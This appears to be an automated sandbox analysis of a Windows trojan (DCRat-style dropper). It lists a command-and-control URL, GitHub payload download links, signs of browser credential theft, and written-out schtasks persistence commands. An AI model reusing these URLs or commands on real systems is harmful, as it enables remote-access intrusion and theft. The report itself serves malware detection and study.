Source: HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe, 0000001E.00000002.2570123434.00000000033AE000.00000004.00000800.00020000.00000000.sdmp, HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe, 0000001E.00000002.2570123434.00000000037E5000.00000004.00000800.00020000.00000000.sdmp, HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe, 0000001E.00000002.2570123434.0000000003979000.00000004.00000800.00020000.00000000.sdmp, HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe, 0000001E.00000002.2570123434.0000000003461000.00000004.00000800.00020000.00000000.sdmp, HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe, 0000001E.00000002.2570123434.00000000034BE000.00000004.00000800.00020000.00000000.sdmp, HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe, 0000001E.00000002.2570123434.0000000003652000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://188.120.227.56/VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php
Source: HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe, 0000001E.00000002.2570123434.00000000034BE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://188.120.227.56/VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.phpU1NW
Source: HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe, 0000001E.00000002.2570123434.00000000034BE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://188.120.227.56/VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.phpntdr
Source: Dfim58cp4J.exe, 00000001.00000002.1439321992.0000000002DB9000.00000004.00000800.00020000.00000000.sdmp, Dfim58cp4J.exe, 00000001.00000002.1439321992.0000000002D02000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://github.com
Source: Dfim58cp4J.exe, 00000001.00000002.1439321992.0000000002D4B000.00000004.00000800.00020000.00000000.sdmp, Dfim58cp4J.exe, 00000001.00000002.1439321992.0000000002DB9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://objects.githubusercontent.com
Source: Dfim58cp4J.exe, 00000001.00000002.1439321992.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, comReviewsvc.exe, 00000008.00000002.1681884269.000000000393F000.00000004.00000800.00020000.00000000.sdmp, HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe, 0000001E.00000002.2570123434.000000000330C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe, 0000001E.00000002.2592652768.0000000013294000.00000004.00000800.00020000.00000000.sdmp, HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe, 0000001E.00000002.2592652768.00000000134A8000.00000004.00000800.00020000.00000000.sdmp, 5QC4vmOVXb.30.dr, 8mqq8UsJhK.30.dr, y8eRAgYVdf.30.dr, N321RUFHkm.30.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe, 0000001E.00000002.2592652768.0000000013294000.00000004.00000800.00020000.00000000.sdmp, HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe, 0000001E.00000002.2592652768.00000000134A8000.00000004.00000800.00020000.00000000.sdmp, 5QC4vmOVXb.30.dr, 8mqq8UsJhK.30.dr, y8eRAgYVdf.30.dr, N321RUFHkm.30.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe, 0000001E.00000002.2592652768.0000000013294000.00000004.00000800.00020000.00000000.sdmp, HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe, 0000001E.00000002.2592652768.00000000134A8000.00000004.00000800.00020000.00000000.sdmp, 5QC4vmOVXb.30.dr, 8mqq8UsJhK.30.dr, y8eRAgYVdf.30.dr, N321RUFHkm.30.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe, 0000001E.00000002.2592652768.0000000013294000.00000004.00000800.00020000.00000000.sdmp, HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe, 0000001E.00000002.2592652768.00000000134A8000.00000004.00000800.00020000.00000000.sdmp, 5QC4vmOVXb.30.dr, 8mqq8UsJhK.30.dr, y8eRAgYVdf.30.dr, N321RUFHkm.30.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe, 0000001E.00000002.2592652768.0000000013294000.00000004.00000800.00020000.00000000.sdmp, HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe, 0000001E.00000002.2592652768.00000000134A8000.00000004.00000800.00020000.00000000.sdmp, 5QC4vmOVXb.30.dr, 8mqq8UsJhK.30.dr, y8eRAgYVdf.30.dr, N321RUFHkm.30.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe, 0000001E.00000002.2592652768.0000000013294000.00000004.00000800.00020000.00000000.sdmp, HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe, 0000001E.00000002.2592652768.00000000134A8000.00000004.00000800.00020000.00000000.sdmp, 5QC4vmOVXb.30.dr, 8mqq8UsJhK.30.dr, y8eRAgYVdf.30.dr, N321RUFHkm.30.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe, 0000001E.00000002.2592652768.0000000013294000.00000004.00000800.00020000.00000000.sdmp, HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe, 0000001E.00000002.2592652768.00000000134A8000.00000004.00000800.00020000.00000000.sdmp, 5QC4vmOVXb.30.dr, 8mqq8UsJhK.30.dr, y8eRAgYVdf.30.dr, N321RUFHkm.30.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Dfim58cp4J.exe, 00000001.00000002.1439321992.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, Dfim58cp4J.exe, 00000001.00000002.1439321992.0000000002DB9000.00000004.00000800.00020000.00000000.sdmp, Dfim58cp4J.exe, 00000001.00000002.1439321992.0000000002CFD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com
Source: Dfim58cp4J.exe, 00000001.00000002.1439321992.0000000002C38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/GGGamessamp/fewfwe/releases/download/ZigZag/DCRatBuild.exe
Source: Dfim58cp4J.exe, 00000001.00000002.1439321992.0000000002DB9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/GGGamessamp/fewfwe/releases/download/ZigZag/M.exe
Source: Dfim58cp4J.exe, 00000001.00000002.1439321992.0000000002DB9000.00000004.00000800.00020000.00000000.sdmp, Dfim58cp4J.exe, 00000001.00000002.1439321992.0000000002D26000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://objects.githubusercontent.com
Source: Dfim58cp4J.exe, 00000001.00000002.1439321992.0000000002DB9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://objects.githubusercontent.com/github-production-release-asset-2e65be/868158503/16b63538-1c52
Source: Dfim58cp4J.exe, 00000001.00000002.1439321992.0000000002D26000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://objects.githubusercontent.com/github-production-release-asset-2e65be/868158503/6f820ef3-3e4b
Source: HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe, 0000001E.00000002.2592652768.0000000013294000.00000004.00000800.00020000.00000000.sdmp, HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe, 0000001E.00000002.2592652768.00000000134A8000.00000004.00000800.00020000.00000000.sdmp, 5QC4vmOVXb.30.dr, 8mqq8UsJhK.30.dr, y8eRAgYVdf.30.dr, N321RUFHkm.30.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe, 0000001E.00000002.2592652768.0000000013294000.00000004.00000800.00020000.00000000.sdmp, HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe, 0000001E.00000002.2592652768.00000000134A8000.00000004.00000800.00020000.00000000.sdmp, 5QC4vmOVXb.30.dr, 8mqq8UsJhK.30.dr, y8eRAgYVdf.30.dr, N321RUFHkm.30.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49702

Source: unknown	HTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.7:49702 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.7:49704 version: TLS 1.2

Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe

Window created: window name: CLIPBRDWNDCLASS

System Summary

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\SysWOW64\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\DC.exe

Code function: 3_2_00BD6FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,

3_2_00BD6FAA

Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Code function: 1_2_00007FFAAC2B0C91	1_2_00007FFAAC2B0C91
Source: C:\Users\user\AppData\Local\Temp\DC.exe	Code function: 3_2_00BD848E	3_2_00BD848E
Source: C:\Users\user\AppData\Local\Temp\DC.exe	Code function: 3_2_00BE00B7	3_2_00BE00B7
Source: C:\Users\user\AppData\Local\Temp\DC.exe	Code function: 3_2_00BE4088	3_2_00BE4088
Source: C:\Users\user\AppData\Local\Temp\DC.exe	Code function: 3_2_00BD40FE	3_2_00BD40FE
Source: C:\Users\user\AppData\Local\Temp\DC.exe	Code function: 3_2_00BF51C9	3_2_00BF51C9
Source: C:\Users\user\AppData\Local\Temp\DC.exe	Code function: 3_2_00BE7153	3_2_00BE7153
Source: C:\Users\user\AppData\Local\Temp\DC.exe	Code function: 3_2_00BD32F7	3_2_00BD32F7
Source: C:\Users\user\AppData\Local\Temp\DC.exe	Code function: 3_2_00BE62CA	3_2_00BE62CA
Source: C:\Users\user\AppData\Local\Temp\DC.exe	Code function: 3_2_00BE43BF	3_2_00BE43BF
Source: C:\Users\user\AppData\Local\Temp\DC.exe	Code function: 3_2_00BDC426	3_2_00BDC426
Source: C:\Users\user\AppData\Local\Temp\DC.exe	Code function: 3_2_00BDF461	3_2_00BDF461
Source: C:\Users\user\AppData\Local\Temp\DC.exe	Code function: 3_2_00BFD440	3_2_00BFD440
Source: C:\Users\user\AppData\Local\Temp\DC.exe	Code function: 3_2_00BE77EF	3_2_00BE77EF
Source: C:\Users\user\AppData\Local\Temp\DC.exe	Code function: 3_2_00BFD8EE	3_2_00BFD8EE
Source: C:\Users\user\AppData\Local\Temp\DC.exe	Code function: 3_2_00BD286B	3_2_00BD286B
Source: C:\Users\user\AppData\Local\Temp\DC.exe	Code function: 3_2_00BDE9B7	3_2_00BDE9B7
Source: C:\Users\user\AppData\Local\Temp\DC.exe	Code function: 3_2_00C019F4	3_2_00C019F4
Source: C:\Users\user\AppData\Local\Temp\DC.exe	Code function: 3_2_00BE6CDC	3_2_00BE6CDC
Source: C:\Users\user\AppData\Local\Temp\DC.exe	Code function: 3_2_00BE3E0B	3_2_00BE3E0B
Source: C:\Users\user\AppData\Local\Temp\DC.exe	Code function: 3_2_00BF4F9A	3_2_00BF4F9A
Source: C:\Users\user\AppData\Local\Temp\DC.exe	Code function: 3_2_00BDEFE2	3_2_00BDEFE2
Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	Code function: 8_2_00007FFAAC400DA0	8_2_00007FFAAC400DA0
Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	Code function: 8_2_00007FFAAC5C3DF2	8_2_00007FFAAC5C3DF2
Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	Code function: 8_2_00007FFAAC5B0ACD	8_2_00007FFAAC5B0ACD
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Code function: 30_2_00007FFAAC3FB86D	30_2_00007FFAAC3FB86D
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Code function: 30_2_00007FFAAC42A000	30_2_00007FFAAC42A000
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Code function: 30_2_00007FFAAC439D64	30_2_00007FFAAC439D64
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Code function: 30_2_00007FFAAC3E0DA0	30_2_00007FFAAC3E0DA0
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Code function: 30_2_00007FFAAC5A3DF2	30_2_00007FFAAC5A3DF2
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Code function: 30_2_00007FFAAC590ACD	30_2_00007FFAAC590ACD
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Code function: 30_2_00007FFAAC958974	30_2_00007FFAAC958974
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Code function: 31_2_00007FFAAC43A000	31_2_00007FFAAC43A000
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Code function: 31_2_00007FFAAC449D64	31_2_00007FFAAC449D64
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Code function: 31_2_00007FFAAC430EFA	31_2_00007FFAAC430EFA
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Code function: 31_2_00007FFAAC430EF0	31_2_00007FFAAC430EF0
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Code function: 31_2_00007FFAAC3F0DA0	31_2_00007FFAAC3F0DA0
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Code function: 31_2_00007FFAAC40B86D	31_2_00007FFAAC40B86D
Source: C:\ServerfontSessiondhcpcommon\System.exe	Code function: 34_2_00007FFAAC43A000	34_2_00007FFAAC43A000
Source: C:\ServerfontSessiondhcpcommon\System.exe	Code function: 34_2_00007FFAAC449D64	34_2_00007FFAAC449D64
Source: C:\ServerfontSessiondhcpcommon\System.exe	Code function: 34_2_00007FFAAC430EFA	34_2_00007FFAAC430EFA
Source: C:\ServerfontSessiondhcpcommon\System.exe	Code function: 34_2_00007FFAAC430EF0	34_2_00007FFAAC430EF0
Source: C:\ServerfontSessiondhcpcommon\System.exe	Code function: 34_2_00007FFAAC3F0DA0	34_2_00007FFAAC3F0DA0
Source: C:\ServerfontSessiondhcpcommon\System.exe	Code function: 34_2_00007FFAAC40B86D	34_2_00007FFAAC40B86D
Source: C:\ServerfontSessiondhcpcommon\System.exe	Code function: 35_2_00007FFAAC410EFA	35_2_00007FFAAC410EFA
Source: C:\ServerfontSessiondhcpcommon\System.exe	Code function: 35_2_00007FFAAC410EF0	35_2_00007FFAAC410EF0
Source: C:\ServerfontSessiondhcpcommon\System.exe	Code function: 35_2_00007FFAAC3EB86D	35_2_00007FFAAC3EB86D
Source: C:\ServerfontSessiondhcpcommon\System.exe	Code function: 35_2_00007FFAAC3D0DA0	35_2_00007FFAAC3D0DA0
Source: C:\ServerfontSessiondhcpcommon\System.exe	Code function: 35_2_00007FFAAC41A008	35_2_00007FFAAC41A008
Source: C:\ServerfontSessiondhcpcommon\System.exe	Code function: 35_2_00007FFAAC429D64	35_2_00007FFAAC429D64
Source: C:\ServerfontSessiondhcpcommon\System.exe	Code function: 36_2_00007FFAAC3D0DA0	36_2_00007FFAAC3D0DA0

Source: C:\Users\user\AppData\Local\Temp\DC.exe	Code function: String function: 00BEEC50 appears 56 times
Source: C:\Users\user\AppData\Local\Temp\DC.exe	Code function: String function: 00BEF5F0 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\DC.exe	Code function: String function: 00BEEB78 appears 39 times

Source: Dfim58cp4J.exe, 00000001.00000002.1439321992.0000000002D1E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs Dfim58cp4J.exe
Source: Dfim58cp4J.exe, 00000001.00000002.1439321992.0000000002C38000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename2llr3S25Wy6MxnK0iW0E9xOiPSpq4EGE.exe4 vs Dfim58cp4J.exe
Source: Dfim58cp4J.exe, 00000001.00000002.1439321992.0000000002DB9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs Dfim58cp4J.exe
Source: Dfim58cp4J.exe, 00000001.00000002.1439321992.0000000002DA7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs Dfim58cp4J.exe
Source: Dfim58cp4J.exe, 00000001.00000000.1312124353.0000000000822000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilename2llr3S25Wy6MxnK0iW0E9xOiPSpq4EGE.exe4 vs Dfim58cp4J.exe
Source: Dfim58cp4J.exe, 00000001.00000002.1439321992.0000000002BA5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename2llr3S25Wy6MxnK0iW0E9xOiPSpq4EGE.exe4 vs Dfim58cp4J.exe
Source: Dfim58cp4J.exe	Binary or memory string: OriginalFilename2llr3S25Wy6MxnK0iW0E9xOiPSpq4EGE.exe4 vs Dfim58cp4J.exe

Source: Dfim58cp4J.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: Dfim58cp4J.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: comReviewsvc.exe.3.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: services.exe.8.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe.8.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: ApplicationFrameHost.exe.8.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: System.exe.8.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Dfim58cp4J.exe, hE5Qy0s8jAQdVrQ9GF.cs	Cryptographic APIs: 'CreateDecryptor'
Source: Dfim58cp4J.exe, hE5Qy0s8jAQdVrQ9GF.cs	Cryptographic APIs: 'CreateDecryptor'
Source: Dfim58cp4J.exe, hE5Qy0s8jAQdVrQ9GF.cs	Cryptographic APIs: 'CreateDecryptor'
Source: Dfim58cp4J.exe, hE5Qy0s8jAQdVrQ9GF.cs	Cryptographic APIs: 'CreateDecryptor'

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@39/59@3/3

Source: C:\Users\user\AppData\Local\Temp\DC.exe

Code function: 3_2_00BD6C74 GetLastError,FormatMessageW,

3_2_00BD6C74

Source: C:\Users\user\AppData\Local\Temp\DC.exe

Code function: 3_2_00BEA6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,

3_2_00BEA6C2

Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe

File created: C:\Program Files (x86)\windowspowershell\Modules\PackageManagement\1.0.0.1\services.exe

Jump to behavior

Source: C:\Users\user\Desktop\Dfim58cp4J.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Dfim58cp4J.exe.log

Jump to behavior

Source: C:\ServerfontSessiondhcpcommon\System.exe	Mutant created: NULL
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\ca15e5db4ee20e7ef974cb6bea1749adfd861faf677919c47497c4bd91f7849b
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2324:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5640:120:WilError_03

Source: C:\Users\user\Desktop\Dfim58cp4J.exe

File created: C:\Users\user\AppData\Local\Temp\DC.exe

Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ServerfontSessiondhcpcommon\rRsN24KgvF8tfDCZTHbc8YaYPrEwJMoOvgbTdRUF.bat" "

Source: C:\Users\user\AppData\Local\Temp\DC.exe	Command line argument: sfxname	3_2_00BEDF1E
Source: C:\Users\user\AppData\Local\Temp\DC.exe	Command line argument: sfxstime	3_2_00BEDF1E
Source: C:\Users\user\AppData\Local\Temp\DC.exe	Command line argument: STARTDLG	3_2_00BEDF1E

Source: Dfim58cp4J.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Dfim58cp4J.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\Dfim58cp4J.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Dfim58cp4J.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: aofgzBPmys.30.dr, NDYsEwBm1c.30.dr, kxZJJXaHRj.30.dr, ql2J0733XV.30.dr, Kq8opN8DIj.30.dr

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: Dfim58cp4J.exe	ReversingLabs: Detection: 65%
Source: Dfim58cp4J.exe	Virustotal: Detection: 66%

Source: C:\Users\user\Desktop\Dfim58cp4J.exe

File read: C:\Users\user\Desktop\Dfim58cp4J.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Dfim58cp4J.exe "C:\Users\user\Desktop\Dfim58cp4J.exe"
Source: C:\Users\user\Desktop\Dfim58cp4J.exe	Process created: C:\Users\user\AppData\Local\Temp\DC.exe "C:\Users\user\AppData\Local\Temp\DC.exe"
Source: C:\Users\user\AppData\Local\Temp\DC.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ServerfontSessiondhcpcommon\eaCU8Ys0bTHhRgAXuIP2K2y8ZFscnTNFvzEdLnUp1L90rgZK9PR.vbe"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ServerfontSessiondhcpcommon\rRsN24KgvF8tfDCZTHbc8YaYPrEwJMoOvgbTdRUF.bat" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe "C:\ServerfontSessiondhcpcommon/comReviewsvc.exe"
Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "servicess" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\windowspowershell\Modules\PackageManagement\1.0.0.1\services.exe'" /f
Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Program Files (x86)\windowspowershell\Modules\PackageManagement\1.0.0.1\services.exe'" /rl HIGHEST /f
Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "servicess" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\windowspowershell\Modules\PackageManagement\1.0.0.1\services.exe'" /rl HIGHEST /f
Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "HHfZjsufdvzxFpnqfrPtJXXoIspuxAH" /sc MINUTE /mo 7 /tr "'C:\ServerfontSessiondhcpcommon\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe'" /f
Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "HHfZjsufdvzxFpnqfrPtJXXoIspuxA" /sc ONLOGON /tr "'C:\ServerfontSessiondhcpcommon\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe'" /rl HIGHEST /f
Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "HHfZjsufdvzxFpnqfrPtJXXoIspuxAH" /sc MINUTE /mo 5 /tr "'C:\ServerfontSessiondhcpcommon\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe'" /rl HIGHEST /f
Source: C:\ServerfontSessiondhcpcommon\comReviewsvc.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ApplicationFrameHostA" /sc MINUTE /mo 6 /tr "'C:\ServerfontSessiondhcpcommon\ApplicationFrameHost.exe'" /f
